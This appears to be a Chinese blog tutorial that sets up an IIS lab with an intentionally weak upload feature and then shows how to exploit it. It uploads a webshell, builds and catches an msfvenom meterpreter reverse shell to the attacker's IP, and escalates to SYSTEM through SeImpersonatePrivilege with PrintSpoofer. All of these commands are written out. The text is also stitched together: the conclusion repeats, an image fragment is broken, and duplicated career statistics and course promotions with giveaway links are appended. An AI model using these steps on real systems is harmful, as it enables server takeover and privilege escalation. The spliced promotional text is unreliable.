在本文中,我们将展示在运行 Windows Server 2019 计算机的 IIS 服务器上创建实验室环境的过程。设置 IIS
服务器后,我们将重点介绍使用 SeImpersontePrivilege 或 Impersonate a Client After
Authentication”用户权限,以使用不同的方法提升机器上的访问权限。
目录
介绍
实验室设置
IIS安装
添加上传功能
更改权限
IIS服务器的利用
使用 PrintSpoofer 提升权限
结论
介绍
谈到SeImpersonatePrivilege(身份验证后模拟客户端),它是在Windows 2000 SP4
中引入的。被分配此权限的用户是设备本地管理员组的成员和设备的本地服务帐户。除了这些用户和组之外,以下组件也具有此用户权限: 由服务控制管理器组件对象模型
(COM) 服务器启动的服务由 COM 基础结构启动并配置为在特定帐户下运行
现在我们知道哪些类型的用户拥有此特权,是时候了解用户使用这些特权获得什么了。每当为用户分配 SeImpersontatePrivilege
时,就允许该用户代表该用户运行程序以模拟客户端。
现在我们对SeImpersontatePrivilege 有了一定的了解。现在让我们深入了解实验室设置。我们将在进行时讨论这个问题。
实验室设置
正如我们从简介中了解到的,这种权限是针对本地管理员或具有类似角色的用户设置的。因此,为了复制该漏洞,我们将使用带有 AD 的 Window Server
2019。当微软修补漏洞时,我们将使用 Build 17763,如下图所示。
**系统信息**
IIS安装
我们将通过在我们的机器上安装 IIS 服务器来获得特定的权限。要配置 IIS
服务器,我们需要打开服务器管理器并从快速启动菜单中选择添加角色和功能,如下图所示。
这将打开安装向导。我们在没有做任何更改的情况下浏览了“开始之前”部分。现在我们看到了安装类型部分,我们将继续选择基于角色或基于功能的安装选项。
同样,我们正在轻松完成服务器选择,因为这对于每个用户都是不同的,因为它基于您为服务器提供的名称及其后续森林。我们进入服务器角色部分。在这里,我们可以选择
Web 服务器 (IIS),如下所示。
按下一步按钮将引导我们进入功能部分。在这里,我们必须确保我们有一些使 IIS 正常运行所需的依赖项。它包括 .NET Framework
4.7;有可能它会默认安装。但除此之外,我们需要安装 ASP .NET 4.7,在 WCF 服务下,我们有 HTTP 激活和 TCP
端口共享。同样,如果您已经安装了某些东西,可以通过单击下一步继续。
现在,我们有了要安装的基于角色的服务的部分。除了我们将选择的 Web 服务器及其包含常见 HTTP
功能、运行状况和诊断、性能和安全组件的组件之外,还会自动选择一些组件,如下图所示。
最后,我们有确认部分。在这里,我们可以验证我们要安装的所有服务和组件。您可以通过单击“安装”按钮继续安装。
安装过程将运行一段时间,然后您将成功安装 IIS 服务。我们可以通过您选择的 Web 浏览器访问服务器的 IP 地址来查看 IIS
欢迎页面。如果遇到问题,请尝试重新启动 IIS 服务或服务器本身。
添加上传功能
与 Linux HTTP 服务器中的 /var/www/html 类似,我们在 inetpub/wwwroot 位置中有等效项。它将具有我们之前在 Web
浏览器上查看的欢迎页面。在这个阶段,我们想将上传功能添加到我们的 IIS
服务器上。为此,我们创建了一些网页和脚本。我们不会在这里详细解释这些。但是,如果您想在部署中添加这些文件,请从我们的 [GitHub
存储库](https://github.com/Ignitetechnologies/Windows-Privilege-Escalation-
SeImpersontatePrivilege.git) 下载文件并将这些文件提取到 wwwroot 目录中,以复制如下所示的图像。
要访问我们 ISS 服务器上的 CS.aspx,我们将编辑 iisstart HTML 页面。第一次打开文件时,您会看到一些评论和 Microsoft
官方链接。我们删除了这些数据并添加了我们服务器的静态地址,后跟 aspx 文件的名称。当我们单击用于重定向到 Microsoft
主页的欢迎页面时,这将使我们的 CS.aspx 网页可访问。我们这样做是为了使我们的应用程序易于访问。
更改权限
添加带有上传功能的网页的过程还没有结束,我们需要更改权限,以便我们可以访问网页并上传文件。要更改权限,我们打开 IIS
管理器。在右侧菜单中,我们有图中突出显示的“编辑权限”选项。
这将打开 wwwroot 目录权限。在这里,我们允许域的用户完全控制具有 wwwroot 目录的修改访问权限。但是,存在一种更安全的方法,即为 IIS
服务器的管理创建一个专用用户并为该特定用户添加受限权限。但是,为了时间和方便,我们正在为所有用户申请许可。
利用 IIS 服务器
现在我们已经启动并运行了 IIS 服务器。尽管我们必须提到,如果您的 IIS 服务器未按预期工作,请尝试重新启动 IIS 服务或服务器本身。继续,为了利用
IIS 服务器,我们添加了文件上传功能。转到我们的攻击者机器,即 Kali 机器。在这里,我们在网络中也设置了 Kali 机器,这样就可以通过 Kali
上的 Web 浏览器访问 IIS 服务。我们浏览文件上传功能并上传位于网页上 /usr/share/webshells/aspx/cmdasp.aspx
的 ASP 命令外壳,如下图所示。
单击“上传”按钮,我们将成功上传文件。这只是一个演示;在上传 shell 之前,现实生活场景将具有额外的安全性和步骤。
根据提供上传功能的文件的编程,上传的文件将被放置在上传目录中。因此,我们可以通过浏览 /Uploads/cmdasp.aspx 来访问上传的
shell,如图所示。这里我们有一个字段,可用于在目标机器上运行命令。我们通过运行 net user 命令演示了这一点。
现在我们已经测试了我们可以上传 shell 并执行命令,是时候利用系统并在目标机器上获得一个meterpreter了。这意味着我们需要使用 msfvenom
或您选择的任何其他工具创建有效负载。我们将我们的有效载荷命名为 shell.exe
**msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -f exe > shell.exe**
成功创建有效载荷后,我们将像之前使用 aspx shell 一样上传有效载荷。我们可以看到可执行payload已经成功上传到目标机器上。
现在要生成meterpreter shell,我们还需要执行payload。因此,我们将使用 aspx shell 浏览上传的可执行 shell.exe
文件的路径,如下图所示。
在执行有效载荷之前,我们需要创建一个侦听器,用于捕获从有效载荷生成的 Meterpreter 反向 shell。我们需要提供与使用 msfvenom
制作有效载荷时使用的相同配置。接下来,我们将使用 aspx shell 在机器上利用有效负载并接收 meterpreter
shell。由于我们在这篇文章中关注的是权限,因此我们运行 getprivs
命令来获取在目标机器上启用的权限。我们可以看到在目标机器上启用了有问题的特权,即 SeImpersontatePrivilege。
**msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 1234
exploit
getprivs**
尽管您不需要依赖 Metepreter shell 的 getprivs 命令。您可以在 whoami 命令的帮助下检查启用的权限,并添加 /priv
选项,如下图所示。我们可以看到,我们通过利用获得的会话是针对用户 iisapppool 的。
shell
whoami /priv
whoami
使用 PrintSpoofer 提升权限
在野外滥用以利用我们在本文中讨论的特权的关键资源之一称为
PrintSpoofer。您可以从GitHub获取源代码和准备部署的可执行文件.
该工具相对较新,但它用于提升访问权限的技术已经过时。要了解此工具如何利用
SeImpersontatePrivilege,我们将了解此权限提供的访问权限。正如我们在介绍中所讨论的,此权限允许用户创建具有其他用户访问权限的进程。因此,PrintSpoofer
利用它来提升对 NT Authority 的整体访问权限。在下面的演示中,我们将移至 Public 目录,因为它将具有上传 PrintSpoofer
可利用文件所需的写入权限。然后在上传可执行文件后,我们移动到目标机器上的命令外壳,在列出内容后我们可以看到 PrintSpoofer 可执行文件的传输成功。
使用 PrintSpoofer 漏洞利用非常简单,因为只需要两个参数:-I 用于告诉可执行文件提供交互式会话,-c
用于提供您希望在利用后获得的访问权限。当我们在目标机器上运行这个命令时,我们可以看到它搜索
SeImpersontatePrivilege,然后检查命名管道。随着这些步骤的成功,它继续创建我们提供的 -c 选项作为 NT
权限令牌或访问的过程。我们可以看到生成了一个新的命令 shell 实例,当我们运行 whoami
命令时,我们可以看到我们已经成功提升了我们在目标机器上的权限。
**PrintSpoofer64.exe -i -c cmd
whoami**
结论
这是值得研究和撰写的有趣帖子之一。在研究过程中,很明显,虽然有许多使用各种工具来利用机器上的 SeImpersontatePrivilege
的指南,但没有一个资源显示我们如何首先获得这些权限。我希望该资源可以帮助您掌握利用 SeImpersontatePrivilege 背后的概念和方法。
中…(img-dIjeyRbf-1696120160141)]
结论
这是值得研究和撰写的有趣帖子之一。在研究过程中,很明显,虽然有许多使用各种工具来利用机器上的 SeImpersontatePrivilege
的指南,但没有一个资源显示我们如何首先获得这些权限。我希望该资源可以帮助您掌握利用 SeImpersontatePrivilege 背后的概念和方法。
题外话
初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:
2023届全国高校毕业生预计达到1158万人,就业形势严峻;
国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。
一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。
6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
2022届大学毕业生月收入较高的前10个专业
本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。
具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。
网络安全行业特点
1、就业薪资非常高,涨薪快 2022年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!
2、人才缺口大,就业机会多
2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
行业发展空间大,岗位非常多
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…
职业增值潜力大
网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。
随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。
从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!